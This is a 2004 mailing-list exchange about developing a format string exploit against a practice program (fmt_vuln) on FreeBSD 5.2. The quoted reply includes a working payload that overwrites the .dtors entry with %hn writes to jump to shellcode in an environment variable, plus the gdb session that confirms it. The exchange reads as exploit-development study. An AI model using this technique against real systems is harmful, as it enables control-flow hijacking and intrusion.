Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT

From: Ganbold (ganbold_at_micom.mng.net)
Date: 08/02/04

  • Next message: Arpa Net: "Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT"
    Date: Mon, 02 Aug 2004 11:37:54 +0900
    To: Vlad902 <vlad902@gmail.com>
    
    

    Thank you for the quick answer.

    However, when I try to get EGG in gdb I get:

    bash-2.05b$ uname -msr
    FreeBSD 5.2-CURRENT i386

    bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
    08049828 d __DTOR_END__

    bash-2.05b$ ./getenvaddr EGG
    EGG is located at 0xbfbfe557

    bash-2.05b$ gdb -q ./fmt_vuln
    (no debugging symbols found)...(gdb)
    (gdb) x/1s 0xbfbfe557
    0xbfbfe557: <Address 0xbfbfe557 out of bounds>
    (gdb)

    What should I do in this case? Why does it say "Address out of bounds"?

    Ganbold

    At 09:24 AM 31.07.2004, you wrote:
    >-bash-2.05b$ uname -msr
    >FreeBSD 5.2.1-RC2 i386
    >-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
    >-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
    >08049848 d __DTOR_END__
    >-bash-2.05b$ gdb -q ./fmt_vuln
    >(no debugging symbols found)...(gdb)
    >(gdb) x/1s 0xbfbfedf5
    >0xbfbfedf5: "EGG=vlad902"
    >(gdb) b * 0xbfbfedf9
    >Breakpoint 1 at 0xbfbfedf9
    >(gdb) run `perl -e 'print
    >"\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" .
    >"%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
    >..
    >[*] test_val @ 0x0804979c = -72 0xffffffb8
    >(no debugging symbols found)...(no debugging symbols found)...
    >Breakpoint 1, 0xbfbfedf9 in ?? ()
    >
    >
    > > Can somebody give me some hints, advices and guides?
    >Only advice I can give you is do it by hand rather than having tools
    >do it for you. Although while exploiting it beware, I found the stack
    >is very quirky, which is why I seem to have so many useless %x's
    >lying around
    >
    > -vlad902

